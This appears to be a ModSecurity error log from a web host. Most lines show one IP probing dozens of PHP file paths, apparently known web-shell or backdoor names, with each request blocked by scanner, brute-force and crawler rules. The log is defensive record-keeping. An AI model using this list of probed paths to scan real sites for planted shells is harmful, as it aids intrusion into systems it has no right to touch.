[Tue May 26 16:59:35.296604 2026] [security2:error] [pid 839808:tid 840006] [client 20.104.227.76:51725] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/test1.php"] [unique_id "ahWEH5qtwAfohijxAqhr0QAAAUw"]
[Tue May 26 16:59:35.477906 2026] [security2:error] [pid 839808:tid 840016] [client 20.104.227.76:50693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-mail.php"] [unique_id "ahWEH5qtwAfohijxAqhr1QAAAVY"]
[Tue May 26 16:59:35.478023 2026] [security2:error] [pid 839808:tid 840016] [client 20.104.227.76:50693] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-mail.php"] [unique_id "ahWEH5qtwAfohijxAqhr1QAAAVY"]
[Tue May 26 16:59:35.646455 2026] [security2:error] [pid 839808:tid 840004] [client 20.104.227.76:51820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp.php"] [unique_id "ahWEH5qtwAfohijxAqhr2QAAAUo"]
[Tue May 26 16:59:35.646561 2026] [security2:error] [pid 839808:tid 840004] [client 20.104.227.76:51820] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp.php"] [unique_id "ahWEH5qtwAfohijxAqhr2QAAAUo"]
[Tue May 26 16:59:35.821003 2026] [security2:error] [pid 839808:tid 840063] [client 20.104.227.76:51770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/adminfuns.php"] [unique_id "ahWEH5qtwAfohijxAqhr3QAAAYU"]
[Tue May 26 16:59:35.821102 2026] [security2:error] [pid 839808:tid 840063] [client 20.104.227.76:51770] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/adminfuns.php"] [unique_id "ahWEH5qtwAfohijxAqhr3QAAAYU"]
[Tue May 26 16:59:36.119928 2026] [security2:error] [pid 839808:tid 840058] [client 20.104.227.76:51834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/php8.php"] [unique_id "ahWEIJqtwAfohijxAqhr5AAAAYA"]
[Tue May 26 16:59:36.120042 2026] [security2:error] [pid 839808:tid 840058] [client 20.104.227.76:51834] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/php8.php"] [unique_id "ahWEIJqtwAfohijxAqhr5AAAAYA"]
[Tue May 26 16:59:36.343066 2026] [security2:error] [pid 839808:tid 839982] [client 20.104.227.76:51311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/ioxi-o.php"] [unique_id "ahWEIJqtwAfohijxAqhr8AAAATQ"]
[Tue May 26 16:59:36.343258 2026] [security2:error] [pid 839808:tid 839982] [client 20.104.227.76:51311] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/ioxi-o.php"] [unique_id "ahWEIJqtwAfohijxAqhr8AAAATQ"]
[Tue May 26 16:59:36.357954 2026] [security2:error] [pid 839808:tid 839902] [remote 45.32.67.165:46920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWEIJqtwAfohijxAqhr6QABZ1s"]
[Tue May 26 16:59:37.032461 2026] [security2:error] [pid 839808:tid 840003] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEIJqtwAfohijxAqhr6AAAAUk"]
[Tue May 26 16:59:37.075950 2026] [security2:error] [pid 839808:tid 839979] [client 20.104.227.76:51804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/edit.php"] [unique_id "ahWEIZqtwAfohijxAqhr_gAAATE"]
[Tue May 26 16:59:37.076062 2026] [security2:error] [pid 839808:tid 839979] [client 20.104.227.76:51804] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/edit.php"] [unique_id "ahWEIZqtwAfohijxAqhr_gAAATE"]
[Tue May 26 16:59:37.421783 2026] [security2:error] [pid 839808:tid 839985] [client 20.104.227.76:50764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/sid3.php"] [unique_id "ahWEIZqtwAfohijxAqhsAgAAATc"]
[Tue May 26 16:59:37.421946 2026] [security2:error] [pid 839808:tid 839985] [client 20.104.227.76:50764] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/sid3.php"] [unique_id "ahWEIZqtwAfohijxAqhsAgAAATc"]
[Tue May 26 16:59:37.863414 2026] [security2:error] [pid 839808:tid 840027] [client 20.104.227.76:50711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/166.php"] [unique_id "ahWEIZqtwAfohijxAqhsBgAAAWE"]
[Tue May 26 16:59:37.863527 2026] [security2:error] [pid 839808:tid 840027] [client 20.104.227.76:50711] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/166.php"] [unique_id "ahWEIZqtwAfohijxAqhsBgAAAWE"]
[Tue May 26 16:59:38.080869 2026] [security2:error] [pid 839808:tid 840016] [client 20.104.227.76:51265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/test.php"] [unique_id "ahWEIpqtwAfohijxAqhsDQAAAVY"]
[Tue May 26 16:59:38.081018 2026] [security2:error] [pid 839808:tid 840016] [client 20.104.227.76:51265] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/test.php"] [unique_id "ahWEIpqtwAfohijxAqhsDQAAAVY"]
[Tue May 26 16:59:38.240961 2026] [security2:error] [pid 839808:tid 839988] [client 20.104.227.76:52280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/phpinfo/info.php"] [unique_id "ahWEIpqtwAfohijxAqhsEQAAATo"]
[Tue May 26 16:59:38.241054 2026] [security2:error] [pid 839808:tid 839988] [client 20.104.227.76:52280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/phpinfo/info.php"] [unique_id "ahWEIpqtwAfohijxAqhsEQAAATo"]
[Tue May 26 16:59:38.415593 2026] [security2:error] [pid 839808:tid 839993] [client 20.104.227.76:52283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-the.php"] [unique_id "ahWEIpqtwAfohijxAqhsGAAAAT8"]
[Tue May 26 16:59:38.415739 2026] [security2:error] [pid 839808:tid 839993] [client 20.104.227.76:52283] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-the.php"] [unique_id "ahWEIpqtwAfohijxAqhsGAAAAT8"]
[Tue May 26 16:59:38.634419 2026] [security2:error] [pid 839808:tid 840020] [client 20.104.227.76:51277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/CDX2.php"] [unique_id "ahWEIpqtwAfohijxAqhsHQAAAVo"]
[Tue May 26 16:59:38.634570 2026] [security2:error] [pid 839808:tid 840020] [client 20.104.227.76:51277] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/CDX2.php"] [unique_id "ahWEIpqtwAfohijxAqhsHQAAAVo"]
[Tue May 26 16:59:38.816768 2026] [security2:error] [pid 839808:tid 839986] [client 20.104.227.76:52281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/profile.php"] [unique_id "ahWEIpqtwAfohijxAqhsIgAAATg"]
[Tue May 26 16:59:38.816858 2026] [security2:error] [pid 839808:tid 839986] [client 20.104.227.76:52281] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/profile.php"] [unique_id "ahWEIpqtwAfohijxAqhsIgAAATg"]
[Tue May 26 16:59:39.018904 2026] [security2:error] [pid 839808:tid 840062] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEIZqtwAfohijxAqhsBQAAAYQ"]
[Tue May 26 16:59:39.234552 2026] [security2:error] [pid 839808:tid 840031] [client 20.104.227.76:50812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/ws80.php"] [unique_id "ahWEI5qtwAfohijxAqhsKAAAAWU"]
[Tue May 26 16:59:39.234663 2026] [security2:error] [pid 839808:tid 840031] [client 20.104.227.76:50812] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/ws80.php"] [unique_id "ahWEI5qtwAfohijxAqhsKAAAAWU"]
[Tue May 26 16:59:39.633513 2026] [security2:error] [pid 839808:tid 840038] [client 20.104.227.76:50765] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/a4.php"] [unique_id "ahWEI5qtwAfohijxAqhsNQAAAWw"]
[Tue May 26 16:59:39.633604 2026] [security2:error] [pid 839808:tid 840038] [client 20.104.227.76:50765] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/a4.php"] [unique_id "ahWEI5qtwAfohijxAqhsNQAAAWw"]
[Tue May 26 16:59:39.896793 2026] [security2:error] [pid 839808:tid 840051] [client 20.104.227.76:52235] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/buy.php"] [unique_id "ahWEI5qtwAfohijxAqhsPQAAAXk"]
[Tue May 26 16:59:39.896911 2026] [security2:error] [pid 839808:tid 840051] [client 20.104.227.76:52235] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/buy.php"] [unique_id "ahWEI5qtwAfohijxAqhsPQAAAXk"]
[Tue May 26 16:59:40.102725 2026] [security2:error] [pid 839808:tid 839996] [client 20.104.227.76:52321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/core.php"] [unique_id "ahWEJJqtwAfohijxAqhsRAAAAUI"]
[Tue May 26 16:59:40.102900 2026] [security2:error] [pid 839808:tid 839996] [client 20.104.227.76:52321] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/core.php"] [unique_id "ahWEJJqtwAfohijxAqhsRAAAAUI"]
[Tue May 26 16:59:40.406695 2026] [security2:error] [pid 839808:tid 840048] [client 20.104.227.76:52319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/lock360.php"] [unique_id "ahWEJJqtwAfohijxAqhsSwAAAXY"]
[Tue May 26 16:59:40.406832 2026] [security2:error] [pid 839808:tid 840048] [client 20.104.227.76:52319] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/lock360.php"] [unique_id "ahWEJJqtwAfohijxAqhsSwAAAXY"]
[Tue May 26 16:59:40.622724 2026] [security2:error] [pid 839808:tid 840005] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEI5qtwAfohijxAqhsMAAAAUs"]
[Tue May 26 16:59:40.668191 2026] [security2:error] [pid 839808:tid 840059] [client 20.104.227.76:51778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/bc.php"] [unique_id "ahWEJJqtwAfohijxAqhsVAAAAYE"]
[Tue May 26 16:59:40.668308 2026] [security2:error] [pid 839808:tid 840059] [client 20.104.227.76:51778] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/bc.php"] [unique_id "ahWEJJqtwAfohijxAqhsVAAAAYE"]
[Tue May 26 16:59:40.865191 2026] [security2:error] [pid 839808:tid 840052] [client 20.104.227.76:52344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/av.php"] [unique_id "ahWEJJqtwAfohijxAqhsWwAAAXo"]
[Tue May 26 16:59:40.865299 2026] [security2:error] [pid 839808:tid 840052] [client 20.104.227.76:52344] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/av.php"] [unique_id "ahWEJJqtwAfohijxAqhsWwAAAXo"]
[Tue May 26 16:59:41.066610 2026] [security2:error] [pid 839808:tid 840022] [client 20.104.227.76:52317] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/xs.php"] [unique_id "ahWEJZqtwAfohijxAqhsYQAAAVw"]
[Tue May 26 16:59:41.066721 2026] [security2:error] [pid 839808:tid 840022] [client 20.104.227.76:52317] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/xs.php"] [unique_id "ahWEJZqtwAfohijxAqhsYQAAAVw"]
[Tue May 26 16:59:41.206983 2026] [security2:error] [pid 839808:tid 839943] [client 114.119.145.3:24179] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "virgence.com"] [uri "/index.php/process"] [unique_id "ahWEJZqtwAfohijxAqhsZAAAAQ0"], referer: https://virgence.com/index.php/process
[Tue May 26 16:59:41.244315 2026] [security2:error] [pid 839808:tid 839967] [client 20.104.227.76:52261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/xxa.php"] [unique_id "ahWEJZqtwAfohijxAqhsZwAAASU"]
[Tue May 26 16:59:41.244430 2026] [security2:error] [pid 839808:tid 839967] [client 20.104.227.76:52261] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/xxa.php"] [unique_id "ahWEJZqtwAfohijxAqhsZwAAASU"]
[Tue May 26 16:59:41.382403 2026] [security2:error] [pid 839808:tid 840016] [client 14.164.74.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEJJqtwAfohijxAqhsQAAAAVY"]
[Tue May 26 16:59:41.528839 2026] [security2:error] [pid 839808:tid 840051] [client 20.104.227.76:51815] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/index0.php"] [unique_id "ahWEJZqtwAfohijxAqhscAAAAXk"]
[Tue May 26 16:59:41.528949 2026] [security2:error] [pid 839808:tid 840051] [client 20.104.227.76:51815] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/index0.php"] [unique_id "ahWEJZqtwAfohijxAqhscAAAAXk"]
[Tue May 26 16:59:41.821260 2026] [security2:error] [pid 839808:tid 840009] [client 20.104.227.76:51744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-kz.php"] [unique_id "ahWEJZqtwAfohijxAqhscgAAAU8"]
[Tue May 26 16:59:41.821375 2026] [security2:error] [pid 839808:tid 840009] [client 20.104.227.76:51744] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-kz.php"] [unique_id "ahWEJZqtwAfohijxAqhscgAAAU8"]
[Tue May 26 16:59:41.995832 2026] [security2:error] [pid 839808:tid 839976] [client 20.104.227.76:51284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/19.php"] [unique_id "ahWEJZqtwAfohijxAqhsdgAAAS4"]
[Tue May 26 16:59:41.995961 2026] [security2:error] [pid 839808:tid 839976] [client 20.104.227.76:51284] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/19.php"] [unique_id "ahWEJZqtwAfohijxAqhsdgAAAS4"]
[Tue May 26 16:59:42.169486 2026] [security2:error] [pid 839808:tid 839989] [client 20.104.227.76:52291] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/11.php"] [unique_id "ahWEJpqtwAfohijxAqhsegAAATs"]
[Tue May 26 16:59:42.169616 2026] [security2:error] [pid 839808:tid 839989] [client 20.104.227.76:52291] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/11.php"] [unique_id "ahWEJpqtwAfohijxAqhsegAAATs"]
[Tue May 26 16:59:42.458085 2026] [security2:error] [pid 839808:tid 840059] [client 20.104.227.76:52267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/w.php"] [unique_id "ahWEJpqtwAfohijxAqhsggAAAYE"]
[Tue May 26 16:59:42.458173 2026] [security2:error] [pid 839808:tid 840059] [client 20.104.227.76:52267] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/w.php"] [unique_id "ahWEJpqtwAfohijxAqhsggAAAYE"]
[Tue May 26 16:59:42.650515 2026] [security2:error] [pid 839808:tid 840031] [client 20.104.227.76:51272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/ws78.php"] [unique_id "ahWEJpqtwAfohijxAqhshQAAAWU"]
[Tue May 26 16:59:42.650634 2026] [security2:error] [pid 839808:tid 840031] [client 20.104.227.76:51272] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/ws78.php"] [unique_id "ahWEJpqtwAfohijxAqhshQAAAWU"]
